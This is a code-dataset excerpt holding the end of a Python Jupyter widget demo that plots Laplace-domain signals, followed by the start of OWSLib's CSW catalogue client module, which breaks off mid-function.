\n\t\tdescription='Real[$Y(s)$]:',\n\t\tdisabled=True,\n\t\treadout=True,\n\t\treadout_format='.4f',\n\t\tcontinuous_update=isContinousUpdateOn,\n\t\tlayout=ipw.Layout(width='50%', height='80px'), \n\t)\n\tY2Slider = ipw.FloatSlider(\n\t\tvalue=Y2Array[0,0],\n\t\tmin=np.nanmin(Y2Array[Y2Array != -np.inf]), \n\t\tmax=np.nanmax(Y2Array[Y2Array != np.inf]), \n\t\tdescription='Imag[$Y(s)$]:',\n\t\tdisabled=True,\n\t\treadout=True,\n\t\treadout_format='.4f',\n\t\tcontinuous_update=isContinousUpdateOn,\n\t\tlayout=ipw.Layout(width='50%', height='80px'), \n\t)\n\tfourierCheckbox = ipw.Checkbox(\n\t\tvalue=False,\n\t\tdescription='Fourier Mode',\n\t\tdisabled=False,\n\t\tindent=False\n\t)\n\tshowPolesCheckbox = ipw.Checkbox(\n\t\tvalue=True,\n\t\tdescription='Show poles',\n\t\tdisabled=False,\n\t\tindent=False\n\t)\n\tshowZerosCheckbox = ipw.Checkbox(\n\t\tvalue=True,\n\t\tdescription='Show zeros',\n\t\tdisabled=False,\n\t\tindent=False\n\t)\n\n\tanimDuration = 100\n\tcenterAxisLineOffset = 1\n\thalfWidthFigLayout = ipw.Layout(width='50%', height='400px')\n\n\t# t->y(t) plot\n\txSc = bqp.LinearScale()\n\tySc = bqp.LinearScale()\n\txAxis = bqp.Axis(label='t', scale=xSc, tick_format='0.0f', grid_lines='none')\n\tyAxis = bqp.Axis(label='y(t)', scale=ySc, orientation='vertical', tick_format='0.1f', grid_lines='none')\n\tyLine = bqp.Lines(x=tArray, y=yArray, scales={'x': xSc, 'y': ySc}, labels=['y'], display_legend=True)\n\tyPoint = bqp.Scatter(x=[tSlider.value], y=[ySlider.value], scales={'x': xSc, 'y': ySc}, default_size=128)\n\t#label = bqp.Label(x=[tArray[0]], y=[yArray[0]], scales={'x': xSc, 'y': ySc}, x_offset = 5, y_offset = 5, text=['{:.4f}'.format(yArray[0])])\n\ttyFig = bqp.Figure(axes=[xAxis, yAxis], marks=[yLine, yPoint], title='y(t) = {:.4f}'.format(yArray[0]), layout=ipw.Layout(width='90%', height='400px'), animation_duration=animDuration)\n\n\t# s plot\n\ts1Sc = bqp.LinearScale()\n\ts1Sc.min = np.min(s1Array)\n\ts1Sc.max = np.max(s1Array)\n\ts2Sc = bqp.LinearScale()\n\ts2Sc.min = np.min(s2Array)\n\ts2Sc.max = np.max(s2Array)\n\ts1Axis = bqp.Axis(label='Real', scale=s1Sc, tick_format='0.0f', grid_lines='none')\n\ts2Axis = bqp.Axis(label='Imaginary', scale=s2Sc, orientation='vertical', tick_format='0.0f', grid_lines='none')\n\tsRealLine = bqp.Lines(x=[s1Sc.min - centerAxisLineOffset, s1Sc.max + centerAxisLineOffset], y=[0,0], scales={'x': s1Sc, 'y': s2Sc}, colors=['black'], stroke_width=0.5)\n\tsImagLine = bqp.Lines(x=[0,0], y=[s2Sc.min - centerAxisLineOffset, s2Sc.max + centerAxisLineOffset], scales={'x': s1Sc, 'y': s2Sc}, colors=['black'], stroke_width=0.5)\n\tinputPoint = bqp.Scatter(x=[s1Slider.value], y=[s2Slider.value], scales={'x': s1Sc, 'y': s2Sc}, enable_move=True, colors=['red'])\n\tdragHint = bqp.Label(x=[0], y=[s2Sc.max], scales={'x': s1Sc, 'y': s2Sc}, x_offset = -30, y_offset = 0, text=['Drag me!'])\n\tpoles = bqp.Scatter(x=YPoles.real, y=YPoles.imag, scales={'x': s1Sc, 'y': s2Sc}, colors=['black'], marker='cross', stroke_width=0.5)\n\tzeros = bqp.Scatter(x=YZeros.real, y=YZeros.imag, scales={'x': s1Sc, 'y': s2Sc}, colors=['black'], marker='circle', stroke_width=0.5)\n\tsFig = bqp.Figure(axes=[s1Axis, s2Axis], marks=[sImagLine, zeros, poles, dragHint, inputPoint], title='s = {:.2f}, {:.2f}j'.format(s1Slider.value, s2Slider.value), layout=halfWidthFigLayout, animation_duration=animDuration)\n\n\t# Y(t) plots\n\tY1Sc = bqp.LinearScale()\n\tY1Sc.min = -1 #np.min(Y1Array)\n\tY1Sc.max = 1 #np.max(Y1Array)\n\tY2Sc = bqp.LinearScale()\n\tY2Sc.min = -1 #np.min(Y2Array)\n\tY2Sc.max = 1 #np.max(Y2Array)\n\tY1Axis = bqp.Axis(label='Real', scale=Y1Sc, tick_format='0.0f', grid_lines='none')\n\tY2Axis = bqp.Axis(label='Imaginary', scale=Y2Sc, orientation='vertical', tick_format='0.0f', grid_lines='none')\n\tYRealLine = bqp.Lines(x=[Y1Sc.min - centerAxisLineOffset, Y1Sc.max + centerAxisLineOffset], y=[0,0], scales={'x': Y1Sc, 'y': Y2Sc}, colors=['black'], stroke_width=0.5)\n\tYImagLine = bqp.Lines(x=[0,0], y=[Y2Sc.min - centerAxisLineOffset, Y2Sc.max + centerAxisLineOffset], scales={'x': Y1Sc, 'y': Y2Sc}, colors=['black'], stroke_width=0.5)\n\toutputPoint = bqp.Scatter(x=[Y1Slider.value], y=[Y2Slider.value], scales={'x': Y1Sc, 'y': Y2Sc})\n\tYFig = bqp.Figure(axes=[Y1Axis, Y2Axis], marks=[YRealLine, YImagLine, outputPoint], title='Y(s) = {:.2f}, {:.2f}j'.format(Y1Slider.value, Y2Slider.value), layout=halfWidthFigLayout, animation_duration=animDuration)\n\n\n\t# freq->amplitude plot\n\tr1, r2 = Y(s1Slider.value, s2Array)\n\tampArray = amplitude(r1, r2)\n\n\tfreqSc = bqp.LinearScale()\n\tampSc = bqp.LinearScale()\n\tfreqAxis = bqp.Axis(label='Frequency (Imag[s])', scale=freqSc, tick_format='.0f', grid_lines='none')\n\tampAxis = bqp.Axis(label='Amplitude', scale=ampSc, orientation='vertical', tick_format='.1f', grid_lines='none')\n\tampLine = bqp.Lines(x=s2Array, y=ampArray, scales={'x': freqSc, 'y': ampSc})\n\tampPoint = bqp.Scatter(x=[s2Slider.value], y=[amplitude(Y1Slider.value, Y2Slider.value)], scales={'x': freqSc, 'y': ampSc}, default_size=128)\n\tfreqampFig = bqp.Figure(axes=[freqAxis, ampAxis], marks=[ampLine, ampPoint], title='Amplitude[Y(s)] = {:.2f}'.format(amplitude(Y1Slider.value, Y2Slider.value)), layout=halfWidthFigLayout, animation_duration=animDuration)\n\n\t# EXPERIMENTAL\n\t# 3d amplitude plot\n\tamp3dFig = ipv.figure(xlabel='Real[s]', ylabel='Amplitude[Y(s)]', zlabel='Imag[s]', title='Amplitude[Y(s)] = {:.2f}'.format(amplitude(Y1Slider.value, Y2Slider.value)), layout=ipw.Layout(width='50%', height='600px'), animation_duration=animDuration)\n\ttemp = np.array(amplitude(np.ravel(Y1Array), np.ravel(Y2Array)))\n\tampGrid = temp.reshape(Y1Array.shape)\n\tamp3dPoint = ipv.scatter(x=np.array([s1Slider.value]), y=np.array([amplitude(Y1Slider.value, Y2Slider.value)]), z=np.array([s2Slider.value]), marker='sphere', size=5, color='blue')\n\tamp3dSurface = ipv.plot_surface(x=s1Grid, y=ampGrid, z=s2Grid, color=\"skyblue\")\n\t#\n\n\t@throttle(0.5)\n\tdef handle_tSlider(change):\n\t\ttValue = change['new']\n\t\tupdateRealDomain(tValue)\n\n\tdef updateRealDomain(tValue): \n\t\tyValue = y(tValue)\n\t\tySlider.value = yValue\n\t\tyPoint.x = [tValue]\n\t\tyPoint.y = [yValue]\n\t\ttyFig.title = 'y(t) = {:.4f}'.format(yValue)\n\n\t@throttle(0.5) \n\tdef handle_s1Slider(change):\n\t\ts1Value = change['new']\n\t\ts2Value = s2Slider.value\n\t\tupdateComplexDomain(s1Value, s2Value)\n\t\t\n\t@throttle(0.5) \n\tdef handle_s2Slider(change):\n\t\ts1Value = s1Slider.value\n\t\ts2Value = change['new'] \n\t\tupdateComplexDomain(s1Value, s2Value)\n\t\t\n\t@throttle(0.5)\n\tdef handle_dragging(name, value):\n\t\ts1Slider.value = value['point']['x']\n\t\ts2Slider.value = value['point']['y']\n\t\tdragHint.text = ['']\n\n\tdef handle_fourierCheckbox(change):\n\t\tif change['new'] == True:\n\t\t\ts1Slider.value = 0\n\t\t\ts1Slider.disabled = True\n\t\t\tinputPoint.restrict_y = True\n\t\telse:\n\t\t\ts1Slider.disabled = False\n\t\t\tinputPoint.restrict_y = False\n\t\t\t\n\tdef updateComplexDomain(s1Value, s2Value):\n\t\t# input plot\n\t\tinputPoint.x = [s1Value]\n\t\tinputPoint.y = [s2Value]\n\t\tsFig.title = 's = {:.2f}, {:.2f}j'.format(s1Value, s2Value)\n\t\t\n\t\t# output plot\n\t\tY1Value, Y2Value = Y(s1Value, s2Value)\n\t\toutputPoint.visible = True\n\t\t\n\t\tif(Y1Value > Y1Slider.max or Y1Value < Y1Slider.min):\n\t\t\tY1Slider.readout = False\n\t\t\toutputPoint.visible = False\n\t\telse:\n\t\t\tY1Slider.readout = True \n\t\t\t\n\t\tif(Y2Value > Y2Slider.max or Y2Value < Y2Slider.min):\n\t\t\tY2Slider.readout = False\n\t\t\toutputPoint.visible = False\n\t\telse:\n\t\t\tY2Slider.readout = True\n\n\t\tY1Slider.value = Y1Value\n\t\tY2Slider.value = Y2Value\n\t\toutputPoint.x = [Y1Value]\n\t\toutputPoint.y = [Y2Value]\n\t\tYFig.title = 'Y(s) = {:.2f}, {:.2f}j'.format(Y1Value, Y2Value)\n\t\t\n\t\t# fourier plot\n\t\tr1, r2 = Y(s1Value, s2Array)\n\t\tampArray = amplitude(r1, r2)\n\t\tampLine.y = ampArray\n\t\tampPoint.x = [s2Value] \n\t\tampPoint.y = [amplitude(Y1Value, Y2Value)]\n\t\tfreqampFig.title = 'Amplitude[Y(s)] = {:.2f}'.format(amplitude(Y1Value, Y2Value))\n\t\t\n\t\t# 3d amplitude plot\n\t\tamp3dPoint.x = np.array([s1Value])\n\t\tamp3dPoint.z = np.array([s2Value])\n\t\tamp3dPoint.y = np.array([amplitude(Y1Slider.value, Y2Slider.value)])\n\t\t\n\t# event links\n\ttSlider.observe(handle_tSlider, names='value')\n\ts1Slider.observe(handle_s1Slider, names='value') \n\ts2Slider.observe(handle_s2Slider, names='value') \n\tfourierCheckbox.observe(handle_fourierCheckbox, names='value') \n\tinputPoint.on_drag_end(handle_dragging) \n\t\n\tdisplaybox = ipw.VBox([\n\t\tipw.VBox([ipw.HBox([tSlider, ySlider]), tyFig]),\n\t\tipw.VBox([ipw.HBox([s1Slider, Y1Slider]), \n\t\tipw.HBox([s2Slider, Y2Slider]), \n\t\tipw.HBox([fourierCheckbox])]),\n\t\t#ipw.HBox([fourierCheckbox, showPolesCheckbox, showZerosCheckbox])]), \n\t\tipw.HBox([sFig, YFig]), ipw.HBox([freqampFig, amp3dFig])]\n\t)\n\treturn displaybox","sub_path":"week2_domains/domains_demonstrator.py","file_name":"domains_demonstrator.py","file_ext":"py","file_size_in_byte":11591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"577145450","text":"# -*- coding: ISO-8859-15 -*-\n# =============================================================================\n# Copyright (c) 2009 Tom Kralidis\n#\n# Authors : Tom Kralidis \n#\n# Contact email: tomkralidis@gmail.com\n# =============================================================================\n\n\"\"\" CSW request and response processor \"\"\"\n\nimport inspect\nimport warnings\nfrom io import BytesIO\nimport random\nfrom urllib.parse import urlencode\n\nfrom owslib.etree import etree\nfrom owslib import fes\nfrom owslib import util\nfrom owslib import ows\nfrom owslib.iso import MD_Metadata, FC_FeatureCatalogue\nfrom owslib.fgdc import Metadata\nfrom owslib.dif import DIF\nfrom owslib.gm03 import GM03\nfrom owslib.namespaces import Namespaces\nfrom owslib.util import cleanup_namespaces, bind_url, add_namespaces, OrderedDict, Authentication, openURL, http_post\n\n# default variables\noutputformat = 'application/xml'\n\n\ndef get_namespaces():\n n = Namespaces()\n return n.get_namespaces()\n\n\nnamespaces = get_namespaces()\nschema = 'http://schemas.opengis.net/csw/2.0.2/CSW-discovery.xsd'\nschema_location = '%s %s' % (namespaces['csw'], schema)\n\n\nclass CatalogueServiceWeb(object):\n \"\"\" csw request class \"\"\"\n def __init__(self, url, lang='en-US', version='2.0.2', timeout=10, skip_caps=False,\n username=None, password=None, auth=None):\n \"\"\"\n\n Construct and process a GetCapabilities request\n\n Parameters\n ----------\n\n - url: the URL of the CSW\n - lang: the language (default is 'en-US')\n - version: version (default is '2.0.2')\n - timeout: timeout in seconds\n - skip_caps: whether to skip GetCapabilities processing on init (default is False)\n - username: username for HTTP basic authentication\n - password: password for HTTP basic authentication\n - auth: instance of owslib.util.Authentication\n\n \"\"\"\n if auth:\n if username:\n auth.username = username\n if password:\n auth.password = password\n self.url = util.clean_ows_url(url)\n self.lang = lang\n self.version = version\n self.timeout = timeout\n self.auth = auth or Authentication(username, password)\n self.service = 'CSW'\n self.exceptionreport = None\n self.owscommon = ows.OwsCommon('1.0.0')\n\n if not skip_caps: # process GetCapabilities\n # construct request\n\n data = {'service': self.service, 'version': self.version, 'request': 'GetCapabilities'}\n\n self.request = urlencode(data)\n\n self._invoke()\n\n if self.exceptionreport is None:\n self.updateSequence = self._exml.getroot().attrib.get('updateSequence')\n\n # ServiceIdentification\n val = self._exml.find(util.nspath_eval('ows:ServiceIdentification', namespaces))\n if val is not None:\n self.identification = ows.ServiceIdentification(val, self.owscommon.namespace)\n else:\n self.identification = None\n # ServiceProvider\n val = self._exml.find(util.nspath_eval('ows:ServiceProvider', namespaces))\n if val is not None:\n self.provider = ows.ServiceProvider(val, self.owscommon.namespace)\n else:\n self.provider = None\n # ServiceOperations metadata\n self.operations = []\n for elem in self._exml.findall(util.nspath_eval('ows:OperationsMetadata/ows:Operation', namespaces)):\n self.operations.append(ows.OperationsMetadata(elem, self.owscommon.namespace))\n self.constraints = {}\n for elem in self._exml.findall(util.nspath_eval('ows:OperationsMetadata/ows:Constraint', namespaces)):\n self.constraints[elem.attrib['name']] = ows.Constraint(elem, self.owscommon.namespace)\n self.parameters = {}\n for elem in self._exml.findall(util.nspath_eval('ows:OperationsMetadata/ows:Parameter', namespaces)):\n self.parameters[elem.attrib['name']] = ows.Parameter(elem, self.owscommon.namespace)\n\n # FilterCapabilities\n val = self._exml.find(util.nspath_eval('ogc:Filter_Capabilities', namespaces))\n self.filters = fes.FilterCapabilities(val)\n\n def describerecord(self, typename='csw:Record', format=outputformat):\n \"\"\"\n\n Construct and process DescribeRecord request\n\n Parameters\n ----------\n\n - typename: the typename to describe (default is 'csw:Record')\n - format: the outputFormat (default is 'application/xml')\n\n \"\"\"\n\n # construct request\n node0 = self._setrootelement('csw:DescribeRecord')\n node0.set('service', self.service)\n node0.set('version', self.version)\n node0.set('outputFormat', format)\n node0.set('schemaLanguage', namespaces['xs2'])\n node0.set(util.nspath_eval('xsi:schemaLocation', namespaces), schema_location)\n etree.SubElement(node0, util.nspath_eval('csw:TypeName', namespaces)).text = typename\n\n self.request = node0\n\n self._invoke()\n\n # parse result\n # TODO: process the XML Schema (you're on your own for now with self.response)\n\n def getdomain(self, dname, dtype='parameter'):\n \"\"\"\n\n Construct and process a GetDomain request\n\n Parameters\n ----------\n\n - dname: the value of the Parameter or Property to query\n - dtype: whether to query a parameter (parameter) or property (property)\n\n \"\"\"\n\n # construct request\n dtypename = 'ParameterName'\n node0 = self._setrootelement('csw:GetDomain')\n node0.set('service', self.service)\n node0.set('version', self.version)\n node0.set(util.nspath_eval('xsi:schemaLocation', namespaces), schema_location)\n if dtype == 'property':\n dtypename = 'PropertyName'\n etree.SubElement(node0, util.nspath_eval('csw:%s' % dtypename, namespaces)).text = dname\n\n self.request = node0\n\n self._invoke()\n\n if self.exceptionreport is None:\n self.results = {}\n\n val = self._exml.find(util.nspath_eval('csw:DomainValues', namespaces)).attrib.get('type')\n self.results['type'] = util.testXMLValue(val, True)\n\n val = self._exml.find(util.nspath_eval('csw:DomainValues/csw:%s' % dtypename, namespaces))\n self.results[dtype] = util.testXMLValue(val)\n\n # get the list of values associated with the Domain\n self.results['values'] = []\n\n for f in self._exml.findall(util.nspath_eval('csw:DomainValues/csw:ListOfValues/csw:Value', namespaces)):\n self.results['values'].append(util.testXMLValue(f))\n\n def getrecords(self, qtype=None, keywords=[], typenames='csw:Record', propertyname='csw:AnyText', bbox=None,\n esn='summary', sortby=None, outputschema=namespaces['csw'], format=outputformat, startposition=0,\n maxrecords=10, cql=None, xml=None, resulttype='results'):\n \"\"\"\n\n Construct and process a GetRecords request\n\n Parameters\n ----------\n\n - qtype: type of resource to query (i.e. service, dataset)\n - keywords: list of keywords\n - typenames: the typeNames to query against (default is csw:Record)\n - propertyname: the PropertyName to Filter against\n - bbox: the bounding box of the spatial query in the form [minx,miny,maxx,maxy]\n - esn: the ElementSetName 'full', 'brief' or 'summary' (default is 'summary')\n - sortby: property to sort results on\n - outputschema: the outputSchema (default is 'http://www.opengis.net/cat/csw/2.0.2')\n - format: the outputFormat (default is 'application/xml')\n - startposition: requests a slice of the result set, starting at this position (default is 0)\n - maxrecords: the maximum number of records to return. No records are returned if 0 (default is 10)\n - cql: common query language text. Note this overrides bbox, qtype, keywords\n - xml: raw XML request. Note this overrides all other options\n - resulttype: the resultType 'hits', 'results', 'validate' (default is 'results')\n\n \"\"\"\n\n warnings.warn(\"\"\"Please use the updated 'getrecords2' method instead of 'getrecords'.\n The 'getrecords' method will be upgraded to use the 'getrecords2' parameters\n in a future version of OWSLib.\"\"\")\n\n if xml is not None:\n self.request = etree.fromstring(xml)\n val = self.request.find(util.nspath_eval('csw:Query/csw:ElementSetName', namespaces))\n if val is not None:\n esn = util.testXMLValue(val)\n else:\n # construct request\n node0 = self._setrootelement('csw:GetRecords')\n if etree.__name__ != 'lxml.etree': # apply nsmap manually\n node0.set('xmlns:ows', namespaces['ows'])\n node0.set('xmlns:gmd', namespaces['gmd'])\n node0.set('xmlns:dif', namespaces['dif'])\n node0.set('xmlns:fgdc', namespaces['fgdc'])\n node0.set('outputSchema', outputschema)\n node0.set('outputFormat', format)\n node0.set('version', self.version)\n node0.set('resultType', resulttype)\n node0.set('service', self.service)\n if startposition > 0:\n node0.set('startPosition', str(startposition))\n node0.set('maxRecords', str(maxrecords))\n node0.set(util.nspath_eval('xsi:schemaLocation', namespaces), schema_location)\n\n node1 = etree.SubElement(node0, util.nspath_eval('csw:Query', namespaces))\n node1.set('typeNames', typenames)\n\n etree.SubElement(node1, util.nspath_eval('csw:ElementSetName', namespaces)).text = esn\n\n self._setconstraint(node1, qtype, propertyname, keywords, bbox, cql, None)\n\n if sortby is not None:\n fes.setsortby(node1, sortby)\n\n self.request = node0\n\n self._invoke()\n\n if self.exceptionreport is None:\n self.results = {}\n\n # process search results attributes\n val = self._exml.find(\n util.nspath_eval('csw:SearchResults', namespaces)).attrib.get('numberOfRecordsMatched')\n self.results['matches'] = int(util.testXMLValue(val, True))\n val = self._exml.find(\n util.nspath_eval('csw:SearchResults', namespaces)).attrib.get('numberOfRecordsReturned')\n self.results['returned'] = int(util.testXMLValue(val, True))\n val = self._exml.find(util.nspath_eval('csw:SearchResults', namespaces)).attrib.get('nextRecord')\n self.results['nextrecord'] = int(util.testXMLValue(val, True))\n\n # process list of matching records\n self.records = OrderedDict()\n\n self._parserecords(outputschema, esn)\n\n def getrecordbyid(self, id=[], esn='full', outputschema=namespaces['csw'], format=outputformat):\n \"\"\"\n\n Construct and process a GetRecordById request\n\n Parameters\n ----------\n\n - id: the list of Ids\n - esn: the ElementSetName 'full', 'brief' or 'summary' (default is 'full')\n - outputschema: the outputSchema (default is 'http://www.opengis.net/cat/csw/2.0.2')\n - format: the outputFormat (default is 'application/xml')\n\n \"\"\"\n\n # construct request\n data = {\n 'service': self.service,\n 'version': self.version,\n 'request': 'GetRecordById',\n 'outputFormat': format,\n 'outputSchema': outputschema,\n 'elementsetname': esn,\n 'id': ','.join(id),\n }\n\n self.request = urlencode(data)\n\n self._invoke()\n\n if self.exceptionreport is None:\n self.results = {}\n self.records = OrderedDict()\n self._parserecords(outputschema, esn)\n\n def getrecords2(self, constraints=[], sortby=None, typenames='csw:Record', esn='summary',\n outputschema=namespaces['csw'], format=outputformat, startposition=0,\n maxrecords=10, cql=None, xml=None, resulttype='results'):\n \"\"\"\n\n Construct and process a GetRecords request\n\n Parameters\n ----------\n\n - constraints: the list of constraints (OgcExpression from owslib.fes module)\n - sortby: an OGC SortBy object (SortBy from owslib.fes module)\n - typenames: the typeNames to query against (default is csw:Record)\n - esn: the ElementSetName 'full', 'brief' or 'summary' (default is 'summary')\n - outputschema: the outputSchema (default is 'http://www.opengis.net/cat/csw/2.0.2')\n - format: the outputFormat (default is 'application/xml')\n - startposition: requests a slice of the result set, starting at this position (default is 0)\n - maxrecords: the maximum number of records to return. No records are returned if 0 (default is 10)\n - cql: common query language text. Note this overrides bbox, qtype, keywords\n - xml: raw XML request. Note this overrides all other options\n - resulttype: the resultType 'hits', 'results', 'validate' (default is 'results')\n\n \"\"\"\n\n if xml is not None:\n self.request = etree.fromstring(xml)\n val = self.request.find(util.nspath_eval('csw:Query/csw:ElementSetName', namespaces))\n if val is not None:\n esn = util.testXMLValue(val)\n val = self.request.attrib.get('outputSchema')\n if val is not None:\n outputschema = util.testXMLValue(val, True)\n else:\n # construct request\n node0 = self._setrootelement('csw:GetRecords')\n if etree.__name__ != 'lxml.etree': # apply nsmap manually\n node0.set('xmlns:ows', namespaces['ows'])\n node0.set('xmlns:gmd', namespaces['gmd'])\n node0.set('xmlns:dif', namespaces['dif'])\n node0.set('xmlns:fgdc', namespaces['fgdc'])\n node0.set('outputSchema', outputschema)\n node0.set('outputFormat', format)\n node0.set('version', self.version)\n node0.set('service', self.service)\n node0.set('resultType', resulttype)\n if startposition > 0:\n node0.set('startPosition', str(startposition))\n node0.set('maxRecords', str(maxrecords))\n node0.set(util.nspath_eval('xsi:schemaLocation', namespaces), schema_location)\n\n node1 = etree.SubElement(node0, util.nspath_eval('csw:Query', namespaces))\n node1.set('typeNames', typenames)\n\n etree.SubElement(node1, util.nspath_eval('csw:ElementSetName', namespaces)).text = esn\n\n if any([len(constraints) > 0, cql is not None]):\n node2 = etree.SubElement(node1, util.nspath_eval('csw:Constraint', namespaces))\n node2.set('version', '1.1.0')\n flt = fes.FilterRequest()\n if len(constraints) > 0:\n node2.append(flt.setConstraintList(constraints))\n # Now add a CQL filter if passed in\n elif cql is not None:\n etree.SubElement(node2, util.nspath_eval('csw:CqlText', namespaces)).text = cql\n\n if sortby is not None and isinstance(sortby, fes.SortBy):\n node1.append(sortby.toXML())\n\n self.request = node0\n\n self._invoke()\n\n if self.exceptionreport is None:\n self.results = {}\n\n # process search results attributes\n val = self._exml.find(\n util.nspath_eval('csw:SearchResults', namespaces)).attrib.get('numberOfRecordsMatched')\n self.results['matches'] = int(util.testXMLValue(val, True))\n val = self._exml.find(\n util.nspath_eval('csw:SearchResults', namespaces)).attrib.get('numberOfRecordsReturned')\n self.results['returned'] = int(util.testXMLValue(val, True))\n val = self._exml.find(util.nspath_eval('csw:SearchResults', namespaces)).attrib.get('nextRecord')\n if val is not None:\n self.results['nextrecord'] = int(util.testXMLValue(val, True))\n else:\n warnings.warn(\"\"\"CSW Server did not supply a nextRecord value (it is optional), so the client\n should page through the results in another way.\"\"\")\n # For more info, see:\n # https://github.com/geopython/OWSLib/issues/100\n self.results['nextrecord'] = None\n\n # process list of matching records\n self.records = OrderedDict()\n\n self._parserecords(outputschema, esn)\n\n def transaction(self, ttype=None, typename='csw:Record', record=None, propertyname=None, propertyvalue=None,\n bbox=None, keywords=[], cql=None, identifier=None):\n \"\"\"\n\n Construct and process a Transaction request\n\n Parameters\n ----------\n\n - ttype: the type of transaction 'insert, 'update', 'delete'\n - typename: the typename to describe (default is 'csw:Record')\n - record: the XML record to insert\n - propertyname: the RecordProperty/PropertyName to Filter against\n - propertyvalue: the RecordProperty Value to Filter against (for updates)\n - bbox: the bounding box of the spatial query in the form [minx,miny,maxx,maxy]\n - keywords: list of keywords\n - cql: common query language text. Note this overrides bbox, qtype, keywords\n - identifier: record identifier. Note this overrides bbox, qtype, keywords, cql\n\n \"\"\"\n\n # construct request\n node0 = self._setrootelement('csw:Transaction')\n node0.set('version', self.version)\n node0.set('service', self.service)\n node0.set(util.nspath_eval('xsi:schemaLocation', namespaces), schema_location)\n\n validtransactions = ['insert', 'update', 'delete']\n\n if ttype not in validtransactions: # invalid transaction\n raise RuntimeError('Invalid transaction \\'%s\\'.' % ttype)\n\n node1 = etree.SubElement(node0, util.nspath_eval('csw:%s' % ttype.capitalize(), namespaces))\n\n if ttype != 'update':\n node1.set('typeName', typename)\n\n if ttype == 'insert':\n if record is None:\n raise RuntimeError('Nothing to insert.')\n node1.append(etree.fromstring(record))\n\n if ttype == 'update':\n if record is not None:\n node1.append(etree.fromstring(record))\n else:\n if propertyname is not None and propertyvalue is not None:\n node2 = etree.SubElement(node1, util.nspath_eval('csw:RecordProperty', namespaces))\n etree.SubElement(node2, util.nspath_eval('csw:Name', namespaces)).text = propertyname\n etree.SubElement(node2, util.nspath_eval('csw:Value', namespaces)).text = propertyvalue\n self._setconstraint(node1, None, propertyname, keywords, bbox, cql, identifier)\n\n if ttype == 'delete':\n self._setconstraint(node1, None, propertyname, keywords, bbox, cql, identifier)\n\n self.request = node0\n\n self._invoke()\n self.results = {}\n\n if self.exceptionreport is None:\n self._parsetransactionsummary()\n self._parseinsertresult()\n\n def harvest(self, source, resourcetype, resourceformat=None, harvestinterval=None, responsehandler=None):\n \"\"\"\n\n Construct and process a Harvest request\n\n Parameters\n ----------\n\n - source: a URI to harvest\n - resourcetype: namespace identifying the type of resource\n - resourceformat: MIME type of the resource\n - harvestinterval: frequency of harvesting, in ISO8601\n - responsehandler: endpoint that CSW should responsd to with response\n\n \"\"\"\n\n # construct request\n node0 = self._setrootelement('csw:Harvest')\n node0.set('version', self.version)\n node0.set('service', self.service)\n node0.set(util.nspath_eval('xsi:schemaLocation', namespaces), schema_location)\n etree.SubElement(node0, util.nspath_eval('csw:Source', namespaces)).text = source\n etree.SubElement(node0, util.nspath_eval('csw:ResourceType', namespaces)).text = resourcetype\n if resourceformat is not None:\n etree.SubElement(node0, util.nspath_eval('csw:ResourceFormat', namespaces)).text = resourceformat\n if harvestinterval is not None:\n etree.SubElement(node0, util.nspath_eval('csw:HarvestInterval', namespaces)).text = harvestinterval\n if responsehandler is not None:\n etree.SubElement(node0, util.nspath_eval('csw:ResponseHandler', namespaces)).text = responsehandler\n\n self.request = node0\n\n self._invoke()\n self.results = {}\n\n if self.exceptionreport is None:\n val = self._exml.find(util.nspath_eval('csw:Acknowledgement', namespaces))\n if util.testXMLValue(val) is not None:\n ts = val.attrib.get('timeStamp')\n self.timestamp = util.testXMLValue(ts, True)\n id = val.find(util.nspath_eval('csw:RequestId', namespaces))\n self.id = util.testXMLValue(id)\n else:\n self._parsetransactionsummary()\n self._parseinsertresult()\n\n def get_operation_by_name(self, name):\n \"\"\"Return a named operation\"\"\"\n for item in self.operations:\n if item.name.lower() == name.lower():\n return item\n raise KeyError(\"No operation named %s\" % name)\n\n def getService_urls(self, service_string=None):\n \"\"\"\n\n Return easily identifiable URLs for all service types\n\n Parameters\n ----------\n\n - service_string: a URI to lookup\n\n \"\"\"\n\n urls = []\n for key, rec in list(self.records.items()):\n # create a generator object, and iterate through it until the match is found\n # if not found, gets the default value (here \"none\")\n url = next((d['url'] for d in rec.references if d['scheme'] == service_string), None)\n if url is not None:\n urls.append(url)\n return urls\n\n def _parseinsertresult(self):\n self.results['insertresults'] = []\n for i in self._exml.findall('.//' + util.nspath_eval('csw:InsertResult', namespaces)):\n for j in i.findall(util.nspath_eval('csw:BriefRecord/dc:identifier', namespaces)):\n self.results['insertresults'].append(util.testXMLValue(j))\n\n def _parserecords(self, outputschema, esn):\n if outputschema == namespaces['gmd']: # iso 19139\n for i in self._exml.findall('.//' + util.nspath_eval('gmd:MD_Metadata', namespaces)) or \\\n self._exml.findall('.//' + util.nspath_eval('gmi:MI_Metadata', namespaces)):\n val = i.find(util.nspath_eval('gmd:fileIdentifier/gco:CharacterString', namespaces))\n identifier = self._setidentifierkey(util.testXMLValue(val))\n self.records[identifier] = MD_Metadata(i)\n for i in self._exml.findall('.//' + util.nspath_eval('gfc:FC_FeatureCatalogue', namespaces)):\n identifier = self._setidentifierkey(util.testXMLValue(i.attrib['uuid'], attrib=True))\n self.records[identifier] = FC_FeatureCatalogue(i)\n elif outputschema == namespaces['fgdc']: # fgdc csdgm\n for i in self._exml.findall('.//metadata'):\n val = i.find('idinfo/datasetid')\n identifier = self._setidentifierkey(util.testXMLValue(val))\n self.records[identifier] = Metadata(i)\n elif outputschema == namespaces['dif']: # nasa dif\n for i in self._exml.findall('.//' + util.nspath_eval('dif:DIF', namespaces)):\n val = i.find(util.nspath_eval('dif:Entry_ID', namespaces))\n identifier = self._setidentifierkey(util.testXMLValue(val))\n self.records[identifier] = DIF(i)\n elif outputschema == namespaces['gm03']: # GM03\n for i in self._exml.findall('.//' + util.nspath_eval('gm03:TRANSFER', namespaces)):\n val = i.find(util.nspath_eval('gm03:fileIdentifier', namespaces))\n identifier = self._setidentifierkey(util.testXMLValue(val))\n self.records[identifier] = GM03(i)\n else: # process default\n for i in self._exml.findall('.//' + util.nspath_eval('csw:%s' % self._setesnel(esn), namespaces)):\n val = i.find(util.nspath_eval('dc:identifier', namespaces))\n identifier = self._setidentifierkey(util.testXMLValue(val))\n self.records[identifier] = CswRecord(i)\n\n def _parsetransactionsummary(self):\n val = self._exml.find(util.nspath_eval('csw:TransactionResponse/csw:TransactionSummary', namespaces))\n if val is not None:\n rid = val.attrib.get('requestId')\n self.results['requestid'] = util.testXMLValue(rid, True)\n ts = 